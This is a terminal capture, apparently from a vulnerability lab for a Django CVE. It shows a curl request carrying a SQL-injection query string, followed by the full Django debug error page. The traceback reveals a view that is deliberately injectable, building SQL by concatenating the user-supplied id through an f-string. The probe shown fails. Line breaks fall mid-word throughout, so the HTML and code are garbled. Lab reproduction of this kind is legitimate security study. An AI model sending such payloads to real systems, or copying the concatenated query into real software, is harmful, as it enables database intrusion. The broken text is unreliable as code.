zzz@zzz-virtual-machine
:~/Desktop$ curl -H "Host
: localhost" "
http://192
.168
.20
.128
:8000/?geom
=SRID
=4326;SELECT%20version();--"
<!DOCTYPE html>
<html lang
="en">
<head>
<meta
http-equiv
="content-type" content
="text/html; charset
=utf-8">
<meta name
="robots" content
="NONE,NOARCHIVE">
<title>OperationalError
at /</title>
<style type
="text/css">
html * { padding
:0; margin
:0; }
body * { padding
:10px 20px; }
body * * { padding
:0; }
body { font
:small sans-serif; background-color
:#fff; color
:#000; }
body>div { border-bottom
:1px solid #ddd; }
h1 { font-weight
:normal; }
h2 { margin-bottom
:.8em; }
h3 { margin
:1em 0
.5em 0; }
h4 { margin
:0 0
.5em 0; font-weight
: normal; }
code, p
re { font-size
: 100%; white-space
: p
re-wrap; }
table { border
:1px solid #ccc; border-collapse
: collapse; width
:100%; background
:white; }
tbody td, tbody th { vertical-align
:top; padding
:2px 3px; }
thead th {
padding
:1px 6px 1px 3px; background
:#fefefe; text-align
:left;
font-weight
:normal; font-size
:11px; border
:1px solid #ddd;
}
tbody th { width
:12em; text-align
:right; color
:#666; padding-right
:.5em; }
table
.vars { margin
:5px 0 2px 40px; }
table
.vars td, table
.req td { font-family
:monospace; }
table td
.code { width
:100%; }
table td
.code p
re { overflow
:hidden; }
table
.source th { color
:#666; }
table
.source td { font-family
:monospace; white-space
:p
re; border-bottom
:1px solid #eee; }
ul
.traceback { list-style-type
:none; color
: #222; }
ul
.traceback li
.frame { padding-bottom
:1em; color
:#4f4f4f; }
ul
.traceback li
.user { background-color
:#e0e0e0; color
:#000 }
div
.context { padding
:10px 0; overflow
:hidden; }
div
.context ol { padding-left
:30px; margin
:0 10px; list-style-position
: inside; }
div
.context ol li { font-family
:monospace; white-space
:p
re; color
:#777; cursor
:pointer; padding-left
: 2px; }
div
.context ol li p
re { display
:inline; }
div
.context ol
.context-line li { color
:#464646; background-color
:#dfdfdf; padding
: 3px 2px; }
div
.context ol
.context-line li span { position
:absolute; right
:32px; }
.user div
.context ol
.context-line li { background-color
:#bbb; color
:#000; }
.user div
.context ol li { color
:#666; }
div
.commands { margin-left
: 40px; }
div
.commands a { color
:#555; text-decoration
:none; }
.user div
.commands a { color
: black; }
#summary { background
: #ffc; }
#summary h2 { font-weight
: normal; color
: #666; }
#explanation { background
:#eee; }
#template, #template-not-exist { background
:#f6f6f6; }
#template-not-exist ul { margin
: 0 0 10px 20px; }
#template-not-exist
.postmortem-section { margin-bottom
: 3px; }
#unicode-hint { background
:#eee; }
#traceback { background
:#eee; }
#
requestinfo { background
:#f6f6f6; padding-left
:120px; }
#summary table { border
:none; background
:transpa
rent; }
#
requestinfo h2, #
requestinfo h3 { position
:relative; margin-left
:-100px; }
#
requestinfo h3 { margin-bottom
:-1em; }
.error { background
: #ffc; }
.specific { color
:#cc3300; font-weight
:bold; }
h2 span
.commands { font-size
:.7em; font-weight
:normal; }
span
.commands a
:link {color
:#5E5694;}
p
re.exception_value { font-family
: sans-serif; color
: #575757; font-size
: 1
.5em; margin
: 10px 0 10px 0; }
.append-bottom { margin-bottom
: 10px; }
</style>
<script type
="text/javascript">
function hideAll(elems) {
for (var e
= 0; e < elems
.length; e++) {
elems[e]
.style
.display
= 'none';
}
}
window
.onload
= function() {
hideAll(document
.querySelectorAll('table
.vars'));
hideAll(document
.querySelectorAll('ol
.p
re-context'));
hideAll(document
.querySelectorAll('ol
.post-context'));
hideAll(document
.querySelectorAll('div
.pastebin'));
}
function toggle() {
for (var i
= 0; i < arguments
.length; i++) {
var e
= document
.getElementById(arguments[i]);
if (e) {
e
.style
.display
= e
.style
.display
== 'none' ? 'block'
: 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s
= link
.getElementsByTagName('span')[0];
var uarr
= String
.fromCharCode(0x25b6);
var darr
= String
.fromCharCode(0x25bc);
s
.textContent
= s
.textContent
== uarr ? darr
: uarr;
return false;
}
function switchPastebinFriendly(link) {
s1
= "Switch to copy-and-paste view";
s2
= "Switch back to interactive view";
link
.textContent
= link
.textContent
.trim()
== s1 ? s2
: s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
</script>
</head>
<body>
<div id
="summary">
<h1>OperationalError
at /</h1>
<p
re class
="exception_value">no such column
: None</p
re>
<table class
="meta">
<tr>
<th>
Request Method
:</th>
<td>GET</td>
</tr>
<tr>
<th>
Request URL
:</th>
<td>
http://localhost/?geom
=SRID
=4326;SELECT%20version();--</td>
</tr>
<tr>
<th>Django Version
:</th>
<td>3
.0
.3</td>
</tr>
<tr>
<th>Exception Type
:</th>
<td>OperationalError</td>
</tr>
<tr>
<th>Exception Value
:</th>
<td><p
re>no such column
: None</p
re></td>
</tr>
<tr>
<th>Exception Location
:</th>
<td>/root/django_cve_2020_9402/app/views
.py in index, line 10</td>
</tr>
<tr>
<th>Python Executable
:</th>
<td>/usr/bin/python3</td>
</tr>
<tr>
<th>Python Version
:</th>
<td>3
.10
.12</td>
</tr>
<tr>
<th>Python Path
:</th>
<td><p
re>['/root/django_cve_2020_9402',
'/usr/lib/python310
.zip',
'/usr/lib/python3
.10',
'/usr/lib/python3
.10/lib-dynload',
'/usr/local/lib/python3
.10/dist-packages',
'/usr/lib/python3/dist-packages']</p
re></td>
</tr>
<tr>
<th>Server time
:</th>
<td>Sun, 30 Nov 2025 15
:18
:38 +0000</td>
</tr>
</table>
</div>
<div id
="traceback">
<h2>Traceback <span class
="commands"><a h
ref
="#" onclick
="
return switchPastebinFriendly(this);">
Switch to copy-and-paste view</a></span>
</h2>
<div id
="browserTraceback">
<ul class
="traceback">
<li class
="frame django">
<code>/usr/local/lib/python3
.10/dist-packages/django/co
re/handlers/exception
.py</code> in <code>inner</code>
<div class
="context" id
="c139322623517440">
<ol start
="27" class
="p
re-context" id
="p
re139322623517440">
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re> This decorator is automatically applied to all middlewa
re to ensu
re that</p
re></li>
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re> no middlewa
re leaks an exception and that the next middlewa
re in the stack</p
re></li>
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re> can
rely on getting a
response instead of an exception
.</p
re></li>
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re> """</p
re></li>
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re> @wraps(get_
response)</p
re></li>
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re> def inner(
request)
:</p
re></li>
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re> try
:</p
re></li>
</ol>
<ol start
="34" class
="context-line">
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re>
response
= get_
response(
request)</p
re> <span>…</span></li>
</ol>
<ol start
='35' class
="post-context" id
="post139322623517440">
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re> except Exception as exc
:</p
re></li>
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re>
response
= response_for_exception(
request, exc)</p
re></li>
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re>
return
response</p
re></li>
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re>
return inner</p
re></li>
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re></p
re></li>
<li onclick
="toggle('p
re139322623517440', 'post139322623517440')"><p
re></p
re></li>
</ol>
</div>
<div class
="commands">
<a h
ref
="#" onclick
="
return varToggle(this, '139322623517440')"><span>▶</span> Local vars</a>
</div>
<table class
="vars" id
="v139322623517440">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>exc</td>
<td class
="code"><p
re>OperationalError('no such column
: None')</p
re></td>
</tr>
<tr>
<td>get_
response</td>
<td class
="code"><p
re><bound method BaseHandler
._get_
response of <django
.co
re.handlers
.wsgi
.WSGIHandler object at 0x7eb69376d8d0>></p
re></td>
</tr>
<tr>
<td>
request</td>
<td class
="code"><p
re><WSGI
Request
: GET '/?geom
=SRID
=4326;SELECT%20version();--'></p
re></td>
</tr>
</tbody>
</table>
</li>
<li class
="frame django">
<code>/usr/local/lib/python3
.10/dist-packages/django/co
re/handlers/base
.py</code> in <code>_get_
response</code>
<div class
="context" id
="c139322623522112">
<ol start
="108" class
="p
re-context" id
="p
re139322623522112">
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re> b
reak</p
re></li>
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re></p
re></li>
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re> if
response is None
:</p
re></li>
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re> wrapped_callback
= self
.make_view_atomic(callback)</p
re></li>
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re> try
:</p
re></li>
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re>
response
= wrapped_callback(
request, *callback_args, **callback_kwargs)</p
re></li>
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re> except Exception as e
:</p
re></li>
</ol>
<ol start
="115" class
="context-line">
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re>
response
= self
.process_exception_by_middlewa
re(e,
request)</p
re> <span>…</span></li>
</ol>
<ol start
='116' class
="post-context" id
="post139322623522112">
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re></p
re></li>
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re> # Complain if the view
returned None (a common error)
.</p
re></li>
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re> if
response is None
:</p
re></li>
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re> if isinstance(callback, types
.FunctionType)
: # FBV</p
re></li>
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re> view_name
= callback
.__name__</p
re></li>
<li onclick
="toggle('p
re139322623522112', 'post139322623522112')"><p
re> else
: # CBV</p
re></li>
</ol>
</div>
<div class
="commands">
<a h
ref
="#" onclick
="
return varToggle(this, '139322623522112')"><span>▶</span> Local vars</a>
</div>
<table class
="vars" id
="v139322623522112">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>callback</td>
<td class
="code"><p
re><function index at 0x7eb694005a20></p
re></td>
</tr>
<tr>
<td>callback_args</td>
<td class
="code"><p
re>()</p
re></td>
</tr>
<tr>
<td>callback_kwargs</td>
<td class
="code"><p
re>{}</p
re></td>
</tr>
<tr>
<td>middlewa
re_method</td>
<td class
="code"><p
re><bound method CsrfViewMiddlewa
re.process_view of <django
.middlewa
re.csrf
.CsrfViewMiddlewa
re object at 0x7eb69376d660>></p
re></td>
</tr>
<tr>
<td>
request</td>
<td class
="code"><p
re><WSGI
Request
: GET '/?geom
=SRID
=4326;SELECT%20version();--'></p
re></td>
</tr>
<tr>
<td>
resolver</td>
<td class
="code"><p
re><URL
Resolver 'vuln
.urls' (None
:None) '^/'></p
re></td>
</tr>
<tr>
<td>
resolver_match</td>
<td class
="code"><p
re>
ResolverMatch(func
=app
.views
.index, args
=(), kwargs
={}, url_name
=None, app_names
=[], namespaces
=[], route
=)</p
re></td>
</tr>
<tr>
<td>
response</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>self</td>
<td class
="code"><p
re><django
.co
re.handlers
.wsgi
.WSGIHandler object at 0x7eb69376d8d0></p
re></td>
</tr>
<tr>
<td>wrapped_callback</td>
<td class
="code"><p
re><function index at 0x7eb694005a20></p
re></td>
</tr>
</tbody>
</table>
</li>
<li class
="frame django">
<code>/usr/local/lib/python3
.10/dist-packages/django/co
re/handlers/base
.py</code> in <code>_get_
response</code>
<div class
="context" id
="c139322623521664">
<ol start
="106" class
="p
re-context" id
="p
re139322623521664">
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re>
response
= middlewa
re_method(
request, callback, callback_args, callback_kwargs)</p
re></li>
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re> if
response
:</p
re></li>
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re> b
reak</p
re></li>
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re></p
re></li>
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re> if
response is None
:</p
re></li>
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re> wrapped_callback
= self
.make_view_atomic(callback)</p
re></li>
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re> try
:</p
re></li>
</ol>
<ol start
="113" class
="context-line">
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re>
response
= wrapped_callback(
request, *callback_args, **callback_kwargs)</p
re> <span>…</span></li>
</ol>
<ol start
='114' class
="post-context" id
="post139322623521664">
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re> except Exception as e
:</p
re></li>
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re>
response
= self
.process_exception_by_middlewa
re(e,
request)</p
re></li>
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re></p
re></li>
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re> # Complain if the view
returned None (a common error)
.</p
re></li>
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re> if
response is None
:</p
re></li>
<li onclick
="toggle('p
re139322623521664', 'post139322623521664')"><p
re> if isinstance(callback, types
.FunctionType)
: # FBV</p
re></li>
</ol>
</div>
<div class
="commands">
<a h
ref
="#" onclick
="
return varToggle(this, '139322623521664')"><span>▶</span> Local vars</a>
</div>
<table class
="vars" id
="v139322623521664">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>callback</td>
<td class
="code"><p
re><function index at 0x7eb694005a20></p
re></td>
</tr>
<tr>
<td>callback_args</td>
<td class
="code"><p
re>()</p
re></td>
</tr>
<tr>
<td>callback_kwargs</td>
<td class
="code"><p
re>{}</p
re></td>
</tr>
<tr>
<td>middlewa
re_method</td>
<td class
="code"><p
re><bound method CsrfViewMiddlewa
re.process_view of <django
.middlewa
re.csrf
.CsrfViewMiddlewa
re object at 0x7eb69376d660>></p
re></td>
</tr>
<tr>
<td>
request</td>
<td class
="code"><p
re><WSGI
Request
: GET '/?geom
=SRID
=4326;SELECT%20version();--'></p
re></td>
</tr>
<tr>
<td>
resolver</td>
<td class
="code"><p
re><URL
Resolver 'vuln
.urls' (None
:None) '^/'></p
re></td>
</tr>
<tr>
<td>
resolver_match</td>
<td class
="code"><p
re>
ResolverMatch(func
=app
.views
.index, args
=(), kwargs
={}, url_name
=None, app_names
=[], namespaces
=[], route
=)</p
re></td>
</tr>
<tr>
<td>
response</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>self</td>
<td class
="code"><p
re><django
.co
re.handlers
.wsgi
.WSGIHandler object at 0x7eb69376d8d0></p
re></td>
</tr>
<tr>
<td>wrapped_callback</td>
<td class
="code"><p
re><function index at 0x7eb694005a20></p
re></td>
</tr>
</tbody>
</table>
</li>
<li class
="frame user">
<code>/root/django_cve_2020_9402/app/views
.py</code> in <code>index</code>
<div class
="context" id
="c139322623518016">
<ol start
="3" class
="p
re-context" id
="p
re139322623518016">
<li onclick
="toggle('p
re139322623518016', 'post139322623518016')"><p
re>import sqlite3</p
re></li>
<li onclick
="toggle('p
re139322623518016', 'post139322623518016')"><p
re></p
re></li>
<li onclick
="toggle('p
re139322623518016', 'post139322623518016')"><p
re>def index(
request)
:</p
re></li>
<li onclick
="toggle('p
re139322623518016', 'post139322623518016')"><p
re> id
= request
.GET
.get('id')</p
re></li>
<li onclick
="toggle('p
re139322623518016', 'post139322623518016')"><p
re> # 漏洞点:直接拼接 SQL,触发注入</p
re></li>
<li onclick
="toggle('p
re139322623518016', 'post139322623518016')"><p
re> conn
= sqlite3
.connect('db
.sqlite3')</p
re></li>
<li onclick
="toggle('p
re139322623518016', 'post139322623518016')"><p
re> cursor
= conn
.cursor()</p
re></li>
</ol>
<ol start
="10" class
="context-line">
<li onclick
="toggle('p
re139322623518016', 'post139322623518016')"><p
re> cursor
.execute(f"SELECT id, name FROM app_userinfo WHE
RE id
= {id}")</p
re> <span>…</span></li>
</ol>
<ol start
='11' class
="post-context" id
="post139322623518016">
<li onclick
="toggle('p
re139322623518016', 'post139322623518016')"><p
re>
results
= cursor
.fetchall()</p
re></li>
<li onclick
="toggle('p
re139322623518016', 'post139322623518016')"><p
re> conn
.close()</p
re></li>
<li onclick
="toggle('p
re139322623518016', 'post139322623518016')"><p
re> data
= [{'id'
: row[0], 'name'
: row[1]} for row in
results]</p
re></li>
<li onclick
="toggle('p
re139322623518016', 'post139322623518016')"><p
re>
return Json
Response(data, safe
=False)</p
re></li>
</ol>
</div>
<div class
="commands">
<a h
ref
="#" onclick
="
return varToggle(this, '139322623518016')"><span>▶</span> Local vars</a>
</div>
<table class
="vars" id
="v139322623518016">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>conn</td>
<td class
="code"><p
re><sqlite3
.Connection object at 0x7eb694722d40></p
re></td>
</tr>
<tr>
<td>cursor</td>
<td class
="code"><p
re><sqlite3
.Cursor object at 0x7eb693681040></p
re></td>
</tr>
<tr>
<td>id</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>
request</td>
<td class
="code"><p
re><WSGI
Request
: GET '/?geom
=SRID
=4326;SELECT%20version();--'></p
re></td>
</tr>
</tbody>
</table>
</li>
</ul>
</div>
<form action
="
http://dpaste
.com/" name
="pasteform" id
="pasteform" method
="post">
<div id
="pastebinTraceback" class
="pastebin">
<input type
="hidden" name
="language" value
="PythonConsole">
<input type
="hidden" name
="title"
value
="OperationalError at /">
<input type
="hidden" name
="source" value
="Django Dpaste Agent">
<input type
="hidden" name
="poster" value
="Django">
<texta
rea name
="content" id
="traceback_a
rea" cols
="140" rows
="25">
Environment
:
Request Method
: GET
Request URL
: http://localhost/?geom
=SRID
=4326;SELECT%20version();--
Django Version
: 3
.0
.3
Python Version
: 3
.10
.12
Installed Applications
:
['django
.contrib
.admin',
'django
.contrib
.auth',
'django
.contrib
.contenttypes',
'django
.contrib
.sessions',
'django
.contrib
.messages',
'django
.contrib
.staticfiles',
'app']
Installed Middlewa
re:
['django
.middlewa
re.security
.SecurityMiddlewa
re',
'django
.contrib
.sessions
.middlewa
re.SessionMiddlewa
re',
'django
.middlewa
re.common
.CommonMiddlewa
re',
'django
.middlewa
re.csrf
.CsrfViewMiddlewa
re',
'django
.contrib
.auth
.middlewa
re.AuthenticationMiddlewa
re',
'django
.contrib
.messages
.middlewa
re.MessageMiddlewa
re',
'django
.middlewa
re.clickjacking
.XFrameOptionsMiddlewa
re']
Traceback (most
recent call last)
:
File "/usr/local/lib/python3
.10/dist-packages/django/co
re/handlers/exception
.py", line 34, in inner
response
= get_
response(
request)
File "/usr/local/lib/python3
.10/dist-packages/django/co
re/handlers/base
.py", line 115, in _get_
response
response
= self
.process_exception_by_middlewa
re(e,
request)
File "/usr/local/lib/python3
.10/dist-packages/django/co
re/handlers/base
.py", line 113, in _get_
response
response
= wrapped_callback(
request, *callback_args, **callback_kwargs)
File "/root/django_cve_2020_9402/app/views
.py", line 10, in index
cursor
.execute(f"SELECT id, name FROM app_userinfo WHE
RE id
= {id}")
Exception Type
: OperationalError at /
Exception Value
: no such column
: None
</texta
rea>
<br><br>
<input type
="submit" value
="Sha
re this traceback on a public website">
</div>
</form>
</div>
<div id
="
requestinfo">
<h2>
Request information</h2>
<h3 id
="user-info">USER</h3>
<p>AnonymousUser</p>
<h3 id
="get-info">GET</h3>
<table class
="
req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>geom</td>
<td class
="code"><p
re>'SRID
=4326'</p
re></td>
</tr>
<tr>
<td>SELECT version()</td>
<td class
="code"><p
re>''</p
re></td>
</tr>
<tr>
<td>--</td>
<td class
="code"><p
re>''</p
re></td>
</tr>
</tbody>
</table>
<h3 id
="post-info">POST</h3>
<p>No POST data</p>
<h3 id
="files-info">FILES</h3>
<p>No FILES data</p>
<h3 id
="cookie-info">COOKIES</h3>
<p>No cookie data</p>
<h3 id
="meta-info">META</h3>
<table class
="
req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>COLORTERM</td>
<td class
="code"><p
re>'truecolor'</p
re></td>
</tr>
<tr>
<td>CONTENT_LENGTH</td>
<td class
="code"><p
re>''</p
re></td>
</tr>
<tr>
<td>CONTENT_TYPE</td>
<td class
="code"><p
re>'text/plain'</p
re></td>
</tr>
<tr>
<td>DEBUGINFOD_URLS</td>
<td class
="code"><p
re>''</p
re></td>
</tr>
<tr>
<td>DISPLAY</td>
<td class
="code"><p
re>'
:0'</p
re></td>
</tr>
<tr>
<td>DJANGO_SETTINGS_MODULE</td>
<td class
="code"><p
re>'vuln
.settings'</p
re></td>
</tr>
<tr>
<td>GATEWAY_INTERFACE</td>
<td class
="code"><p
re>'CGI/1
.1'</p
re></td>
</tr>
<tr>
<td>HOME</td>
<td class
="code"><p
re>'/root'</p
re></td>
</tr>
<tr>
<td>
HTTP_ACCEPT</td>
<td class
="code"><p
re>'*/*'</p
re></td>
</tr>
<tr>
<td>
HTTP_HOST</td>
<td class
="code"><p
re>'localhost'</p
re></td>
</tr>
<tr>
<td>
HTTP_USER_AGENT</td>
<td class
="code"><p
re>'curl/7
.81
.0'</p
re></td>
</tr>
<tr>
<td>LANG</td>
<td class
="code"><p
re>'en_US
.UTF-8'</p
re></td>
</tr>
<tr>
<td>LANGUAGE</td>
<td class
="code"><p
re>'en_US
:'</p
re></td>
</tr>
<tr>
<td>LC_ADD
RESS</td>
<td class
="code"><p
re>'zh_CN
.UTF-8'</p
re></td>
</tr>
<tr>
<td>LC_IDENTIFICATION</td>
<td class
="code"><p
re>'zh_CN
.UTF-8'</p
re></td>
</tr>
<tr>
<td>LC_MEASU
REMENT</td>
<td class
="code"><p
re>'zh_CN
.UTF-8'</p
re></td>
</tr>
<tr>
<td>LC_MONETARY</td>
<td class
="code"><p
re>'zh_CN
.UTF-8'</p
re></td>
</tr>
<tr>
<td>LC_NAME</td>
<td class
="code"><p
re>'zh_CN
.UTF-8'</p
re></td>
</tr>
<tr>
<td>LC_NUMERIC</td>
<td class
="code"><p
re>'zh_CN
.UTF-8'</p
re></td>
</tr>
<tr>
<td>LC_PAPER</td>
<td class
="code"><p
re>'zh_CN
.UTF-8'</p
re></td>
</tr>
<tr>
<td>LC_TELEPHONE</td>
<td class
="code"><p
re>'zh_CN
.UTF-8'</p
re></td>
</tr>
<tr>
<td>LC_TIME</td>
<td class
="code"><p
re>'zh_CN
.UTF-8'</p
re></td>
</tr>
<tr>
<td>LESSCLOSE</td>
<td class
="code"><p
re>'/usr/bin/lesspipe %s %s'</p
re></td>
</tr>
<tr>
<td>LESSOPEN</td>
<td class
="code"><p
re>'| /usr/bin/lesspipe %s'</p
re></td>
</tr>
<tr>
<td>LOGNAME</td>
<td class
="code"><p
re>'root'</p
re></td>
</tr>
<tr>
<td>LS_COLORS</td>
<td class
="code"><p
re>'rs
=0
:di
=01;34
:ln
=01;36
:mh
=00
:pi
=40;33
:so
=01;35
:do
=01;35
:bd
=40;33;01
:cd
=40;33;01
:or
=40;31;01
:mi
=00
:su
=37;41
:sg
=30;43
:ca
=30;41
:tw
=30;42
:ow
=34;42
:st
=37;44
:ex
=01;32
:*
.tar
=01;31
:*
.tgz
=01;31
:*
.arc
=01;31
:*
.arj
=01;31
:*
.taz
=01;31
:*
.lha
=01;31
:*
.lz4
=01;31
:*
.lzh
=01;31
:*
.lzma
=01;31
:*
.tlz
=01;31
:*
.txz
=01;31
:*
.tzo
=01;31
:*
.t7z
=01;31
:*
.zip
=01;31
:*
.z
=01;31
:*
.dz
=01;31
:*
.gz
=01;31
:*
.lrz
=01;31
:*
.lz
=01;31
:*
.lzo
=01;31
:*
.xz
=01;31
:*
.zst
=01;31
:*
.tzst
=01;31
:*
.bz2
=01;31
:*
.bz
=01;31
:*
.tbz
=01;31
:*
.tbz2
=01;31
:*
.tz
=01;31
:*
.deb
=01;31
:*
.rpm
=01;31
:*
.jar
=01;31
:*
.war
=01;31
:*
.ear
=01;31
:*
.sar
=01;31
:*
.rar
=01;31
:*
.alz
=01;31
:*
.ace
=01;31
:*
.zoo
=01;31
:*
.cpio
=01;31
:*
.7z
=01;31
:*
.rz
=01;31
:*
.cab
=01;31
:*
.wim
=01;31
:*
.swm
=01;31
:*
.dwm
=01;31
:*
.esd
=01;31
:*
.jpg
=01;35
:*
.jpeg
=01;35
:*
.mjpg
=01;35
:*
.mjpeg
=01;35
:*
.gif
=01;35
:*
.bmp
=01;35
:*
.pbm
=01;35
:*
.pgm
=01;35
:*
.ppm
=01;35
:*
.tga
=01;35
:*
.xbm
=01;35
:*
.xpm
=01;35
:*
.tif
=01;35
:*
.tiff
=01;35
:*
.png
=01;35
:*
.svg
=01;35
:*
.svgz
=01;35
:*
.mng
=01;35
:*
.pcx
=01;35
:*
.mov
=01;35
:*
.mpg
=01;35
:*
.mpeg
=01;35
:*
.m2v
=01;35
:*
.mkv
=01;35
:*
.webm
=01;35
:*
.webp
=01;35
:*
.ogm
=01;35
:*
.mp4
=01;35
:*
.m4v
=01;35
:*
.mp4v
=01;35
:*
.vob
=01;35
:*
.qt
=01;35
:*
.nuv
=01;35
:*
.wmv
=01;35
:*
.asf
=01;35
:*
.rm
=01;35
:*
.rmvb
=01;35
:*
.flc
=01;35
:*
.avi
=01;35
:*
.fli
=01;35
:*
.flv
=01;35
:*
.gl
=01;35
:*
.dl
=01;35
:*
.xcf
=01;35
:*
.xwd
=01;35
:*
.yuv
=01;35
:*
.cgm
=01;35
:*
.emf
=01;35
:*
.ogv
=01;35
:*
.ogx
=01;35
:*
.aac
=00;36
:*
.au
=00;36
:*
.flac
=00;36
:*
.m4a
=00;36
:*
.mid
=00;36
:*
.midi
=00;36
:*
.mka
=00;36
:*
.mp3
=00;36
:*
.mpc
=00;36
:*
.ogg
=00;36
:*
.ra
=00;36
:*
.wav
=00;36
:*
.oga
=00;36
:*
.opus
=00;36
:*
.spx
=00;36
:*
.xspf
=00;36
:'</p
re></td>
</tr>
<tr>
<td>MAIL</td>
<td class
="code"><p
re>'/var/mail/root'</p
re></td>
</tr>
<tr>
<td>OLDPWD</td>
<td class
="code"><p
re>'/root/vulhub/django/CVE-2020-9402/
src'</p
re></td>
</tr>
<tr>
<td>PATH</td>
<td class
="code"><p
re>'/xp/server/docker
:/usr/local/sbin
:/usr/local/bin
:/usr/sbin
:/usr/bin
:/sbin
:/bin
:/snap/bin
:/xp/server/docker'</p
re></td>
</tr>
<tr>
<td>PATH_INFO</td>
<td class
="code"><p
re>'/'</p
re></td>
</tr>
<tr>
<td>PWD</td>
<td class
="code"><p
re>'/root/django_cve_2020_9402'</p
re></td>
</tr>
<tr>
<td>QUERY_STRING</td>
<td class
="code"><p
re>'geom
=SRID
=4326;SELECT%20version();--'</p
re></td>
</tr>
<tr>
<td>
REMOTE_ADDR</td>
<td class
="code"><p
re>'192
.168
.20
.128'</p
re></td>
</tr>
<tr>
<td>
REMOTE_HOST</td>
<td class
="code"><p
re>''</p
re></td>
</tr>
<tr>
<td>
REQUEST_METHOD</td>
<td class
="code"><p
re>'GET'</p
re></td>
</tr>
<tr>
<td>RUN_MAIN</td>
<td class
="code"><p
re>'true'</p
re></td>
</tr>
<tr>
<td>SCRIPT_NAME</td>
<td class
="code"><p
re>''</p
re></td>
</tr>
<tr>
<td>SERVER_NAME</td>
<td class
="code"><p
re>'zzz-virtual-machine'</p
re></td>
</tr>
<tr>
<td>SERVER_PORT</td>
<td class
="code"><p
re>'8000'</p
re></td>
</tr>
<tr>
<td>SERVER_PROTOCOL</td>
<td class
="code"><p
re>'
HTTP/1
.1'</p
re></td>
</tr>
<tr>
<td>SERVER_SOFTWA
RE</td>
<td class
="code"><p
re>'WSGIServer/0
.2'</p
re></td>
</tr>
<tr>
<td>SHELL</td>
<td class
="code"><p
re>'/bin/bash'</p
re></td>
</tr>
<tr>
<td>SHLVL</td>
<td class
="code"><p
re>'1'</p
re></td>
</tr>
<tr>
<td>SUDO_COMMAND</td>
<td class
="code"><p
re>'/bin/bash'</p
re></td>
</tr>
<tr>
<td>SUDO_GID</td>
<td class
="code"><p
re>'1000'</p
re></td>
</tr>
<tr>
<td>SUDO_UID</td>
<td class
="code"><p
re>'1000'</p
re></td>
</tr>
<tr>
<td>SUDO_USER</td>
<td class
="code"><p
re>'zzz'</p
re></td>
</tr>
<tr>
<td>TERM</td>
<td class
="code"><p
re>'xterm-256color'</p
re></td>
</tr>
<tr>
<td>TZ</td>
<td class
="code"><p
re>'UTC'</p
re></td>
</tr>
<tr>
<td>USER</td>
<td class
="code"><p
re>'root'</p
re></td>
</tr>
<tr>
<td>XAUTHORITY</td>
<td class
="code"><p
re>'/run/user/1000/
.mutter-Xwaylandauth
.T2BDG3'</p
re></td>
</tr>
<tr>
<td>XDG_CUR
RENT_DESKTOP</td>
<td class
="code"><p
re>'ubuntu
:GNOME'</p
re></td>
</tr>
<tr>
<td>XDG_DATA_DIRS</td>
<td class
="code"><p
re>'/usr/sha
re/gnome
:/usr/local/sha
re:/usr/sha
re:/var/lib/snapd/desktop'</p
re></td>
</tr>
<tr>
<td>_</td>
<td class
="code"><p
re>'/usr/bin/python3'</p
re></td>
</tr>
<tr>
<td>wsgi
.errors</td>
<td class
="code"><p
re><_io
.TextIOWrapper name
='<stderr>' mode
='w' encoding
